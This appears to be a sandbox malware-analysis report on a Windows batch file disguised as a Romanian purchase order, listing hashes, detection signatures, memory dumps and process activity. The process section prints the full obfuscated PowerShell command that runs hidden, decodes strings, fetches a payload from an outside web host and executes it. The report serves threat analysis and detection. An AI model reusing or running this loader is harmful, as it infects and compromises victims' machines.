Overview

overview

10

Static

static

1

SKGCRO COM...74.bat

windows7-x64

8

SKGCRO COM...74.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    300s
  • max time network
    301s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    17-10-2024 00:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SKGCRO COMANDA FAB SRL M60_647746748846748347474.bat

  • Size

    5KB

  • MD5

    620c71177317e4d49759a6859b4cd0c1

  • SHA1

    a0f7e36d02447e39061c05b3d57f0a23b0c1138d

  • SHA256

    8dd5fd174ee703a43ab5084fdaba84d074152e46b84d588bf63f9d5cd2f673d1

  • SHA512

    a48e32576ea4c2c076269ce26d12f650b90c40307c4049721af8940aea5a5b65cbbe3963a795784dd5f33a4634ebd5cc868f31a761a52d944d81f34905528d2d

  • SSDEEP

    96:gwTiRaJK4FkWL9HVfpB1K4U0NA13Xloa+fHmzHCzAzmw18nvsB1b8Dj79Z6ZwPmx:KRGHCW5HVf1ub3aTmjC0zmw1hMHeZ6mx

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\SKGCRO COMANDA FAB SRL M60_647746748846748347474.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden " <#Armill Koloniseredes Plait Bullfice #>;$Chancen='Ashiver';<#Contrefort Innoculating Biarcuated #>;$Enhedshistorie=$Defilement+$host.UI;function Kreditkort($Corrosible){If ($Enhedshistorie) {$Epistemologiske++;}$Kjolens=$Doksttendes+$Corrosible.'Length'-$Epistemologiske; for( $Rockskipper=4;$Rockskipper -lt $Kjolens;$Rockskipper+=5){$Chronometrically++;$Brsfiasko210+=$Corrosible[$Rockskipper];$Eksplosionsbranden67='Illusionerne';}$Brsfiasko210;}function Noumenality($Hydrognosy){ & ($Barskere) ($Hydrognosy);}$Urethrophyma=Kreditkort 'Pa aMDikooSkolz guriP.aslFrinl onia Ord/Over ';$Urethrophyma+=Kreditkort ' Me 5 U.d.Bevg0feri Duod(PeriWDrugi,asin AmpdVa mo Modw Dags Spe StjrN oldTFor Uns1Unbr0 T r.Udki0,ast;Py.e GalWSetii Skan Mo.6Rgni4 P e;P eu ValoxMona6 unc4For.;Asat FinrDelev to: Str1Scor3Li s1 gid.Di.d0St p)Hvss Ko gGBeboe npic nloksideoKont/Arac2Lseh0Mani1 st.0,ype0 Bli1Depe0Abor1Rnen Ph FDiseiSubtrPaetedatafEx ro rebx.oan/,brd1Lice3Pla,1Det .Slvf0Tabt ';$Helving=Kreditkort 'FnomUSs esAfteehypoRI ds-DasyaS.nigKondE unhNGrupTG at ';$Strictest=Kreditkort 'Sc mhOvertHulltCribp .ecs Tit:Di.s/ Ina/Ontowtabuwexplw mod.K ndmMesaiswatoHar.tsub.tIncoo ndeTelezHvira Sa,n aadeBra.l M llL.tia Luf.Paabc GenoIntemLuoi/Ka sW enkhSor.e vlelPilok ligl stei asik.ysteJent. eveh ntihArghkS ip ';$Udskrivningsprocenters=Kreditkort 'Sknk>Unc. ';$Barskere=Kreditkort 'OpsmiPnseeCarcX Liq ';$Rockskipperndsuget='botherer';$Rejektion='\Groundnut.Sne';Noumenality (Kreditkort ' osm$ An g verlAnmooHyduB,ladadkniLPege: Da H ManOObseLUd rDAboraWi hrFindb f.tEHuskj apiD Fe.Egudet mul=Stra$SterEUnsunP laV Sem:Sej A A cP Afvp Inhd RevA UrotpockA,rev+Uige$Cu ar EduESjipJS rpeForuk c.tT Brui.ispO DienBl,e ');Noumenality (Kreditkort ' Epi$Lserg fkllCento Pe bNeonAAccuLByld:St,nrsalahi,nuI ErizStumOEnt,tInfiiR secUnce= Sko$SemiSFre tundeREfteIYankCGibbtMinieos rsPjustTrsk.UndesNondPWorkLBawcIAssetgrns(S,ms$ Brau nmDPrd sAspiKOutmrJvnliQuaeV.nfrnNymaidi snRestGPeraselempS rmRAn.ooSk,lcBlaaeShennChaitI caETaglrLullSHist) Una ');Noumenality (Kreditkort ' Unt[ ersnToneeRealTsels..ektsPis E,ukkRR imvMeloIMet CDiloE TauPtidso HetiBrneNCrevtBoplMHydraCon,n CovAK.stGEcrueUn,aRPsal] Ups: Sea:Deprs GalEPhilc EpiUP,euRWarni I iTAntay H ePRhytrMagnoProjtCaneO,jerCseroOAdvoLunre Over=Ordh Fle[l ddnHypoeFgtetCome.Unals NitEpacicIntruCli r udI Ud tAfguyKu dPSnobreur OI olTs,ano TusCVenuOP fil ValtLecaYSab pOpdaEDaab]F,st:Stni:EproTDokuLKlveSStre1St m2.rem ');$Strictest=$Rhizotic[0];$undertegnelsen=(Kreditkort 'Rell$EndoGHeadl einO,bscB bokaDaa,lNo m:FrankBundlDiskAGlycG impESt ltR bsePilfMFor aLeonEAnt RBrnenSl vE NiksGn d=U ernSkumeDeprW yld-AzofO punBStu JSprgEMadsCMinitPho .orsSmagyAflvsRangTSabre Es.mHema.BaroN C aESnowTStet.ContwDinoeP lmBUnp cKen,lAnnoI psESpa nRas tRa,a ');Noumenality ($undertegnelsen);Noumenality (Kreditkort ' Mo $ uppKUtoplSektaTrkpgPlageans.tForleSp amSoota DrieAnatrG llnReape nkesFrak.HankHflyveBrn a T mdJen eMagnr DessSpe,[A,is$Fo mHOv re Ob,lRetav utsiAncin Ar gTorn] Tub=Traa$.avmUZed rc meeplantA,skhAlmerAbouoB lopO igh,agayCosymCailaBias ');$Afstber=Kreditkort ' Del$ TgnKW belSli.aTavsgBulneud,it ejleSalumBumsaFu peSickr afbnLurge NonsInfo. Li.DUnavo .liwKamgn odal,elioReimadisad GalFKliniForulBaybeSekt( Pin$TilbSGum tP asrunnaiSavecViratHoveeB.xisRolatU,ho, F.r$BarbACopif S pl upfeResovDeceeGldsr Jose Mel)Kamp ';$Aflevere=$Holdarbejdet;Noumenality (Kreditkort 'Pass$SdmlG LaiLTi hoRetfb WhiAUndelRefo:Wa hSBistUUnfofUnbefFdseU elsAtroEYobsSKarr= Lo (ZiartLeu ESkvaSFiskT .or-NonePTi.sa Tr TEnhaH dm Rkne$ orA.kvtfSemuLNedke ivvKniteSkk rTrffENonh) Fot ');while (!$Suffuses) {Noumenality (Kreditkort 'Blu $bo mgPetrl ecaoOve.bAlteaTw,slVask:IllaHBetiyHemol S yoC,rtzTwanoAntii SlusToastsk t=Pier$ SprtNordrEle,u Grae mim ') ;Noumenality $Afstber;Noumenality (Kreditkort ' Sp,s eritE liaStubr AfltFore-Pr tsScr.LLizaEgourELamepMaho Hi.4Stri ');Noumenality (Kreditkort 'Gede$VincgPapiLPomoOsjleBS deaelixl Tod:Bi.bs LanU edgfUndifDrosuAndesGu.de riaSFj r=Lent(ShorTP raeUnboSMiliTB na- AirP urA ubTGn dHSubs Trev$ Li AC unFUd olUrolEAfspV graEc,inrInc E acb)Quar ') ;Noumenality (Kreditkort ' uxo$UnorG Stel pseoKal BHackA ak,LIso :Ama.aHaraNCigaTFupniDekotUmish Diga ecolRef.ID gsASnusNBi.t=S.ha$TopaGMissLNephO DovBTracaDe.iLOpry: Renu rnnGogodFinaeUnfeRId aSFu tk estrfl aEPus,DFyldNHelleTaleS Sho1Sa a5A.hb2 Ved+Reak+Pare%Hamm$ pearRe,oH LatIaccezRingoFronTNocti K oCEuct. D bCR inO FunUKoncn ,uttMenn ') ;$Strictest=$Rhizotic[$Antithalian];}$Svindenes=301744;$Luftigheds=31316;Noumenality (Kreditkort 'Indu$dr eGBantL DemoForeBDigua U oLbrut:Leg BAnsaLHa sE Hi DExxb Komp=Vens Ned g ndeeAspiT snd-Lon.C DokOTot nPro tRe,sE BagNB llTKell Pap$GearaMaurF,onsLobjeeApnovRy kEIndbrScriEUnd, ');Noumenality (Kreditkort 'Smin$EskegThymlAriao Unib AbeaAk.dlInte:DeviA P vuSludt .proTh,mbKa.ai apoNimbgYnglrNonrafo.sp ildhTegnaWintlCivi1A.me2Nekt Unst=N mi Afte[ riSPar.y ogns G utKir e balmNexo.WechCExpaosummnDamev Pr.eFascr uetJamm]Slen:Kong:S oiF Kvar elioUdn mHexaBSkaaaKancsM steDeve6Suss4NonsSR pat etrSnvsiLorenP,ogg Kon(K li$,kseB ErhlBur.eNestdCoba)Affa ');Noumenality (Kreditkort 'Forp$ub,kg.usslReadoMarlbCubmAHavelsymb: Invr LssEjeepf felu,ntuS.emiIBisaODeriND.oxsO sesKir.a nivLGjo Dpor,o steS Sta2Sy a0Euge7 am .isp= .rt Prol[StrkSUnivY ollSCongTT,rbeVoldMtenj. .ocTsum.EAntiXOverTG.nn. esEFamin RedcKo lo MusD envITideNChu GLing]Plan:G nb: stiAGingsMinic SkaIAwesiEpit. CongSkavePummTRdbesEkspt.userEpicI aagNDo.bgMell(En,o$LarnaBur uDisktVa fOSwagbU,elIB.otoGenngCh oRRok.AInvep rh.hUdspa T nLMil 1Clot2St,f)Napa ');Noumenality (Kreditkort 'elek$Oming Magl H roBillbAr iaModelTota: Bgesodo AUndesP noIh.zza,ell= Dum$RoerrFrugE GlaFVictUAgresAlibICoexo orNEjecsGangsCynoAHoveLRectdOpsto ObbsTagp2 Sle0Bred7 Ing.HypeS Sniucl wbUnprsWhirTSirtRSulfiBesrNChl,ghaem(Hvid$ quasBestV Se,IAmbenTotaD ReaeUdsknTripeUp asDemo,Rept$ Sp L UndUEksaFAsieTBlomIBleeGAtomH L,jeTyngD MirS Gy )R.fo ');Noumenality $Sasia;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2704

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2704-4-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2704-6-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2704-7-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2704-9-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-10-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-8-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-5-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-11-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-12-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2704-13-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-14-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download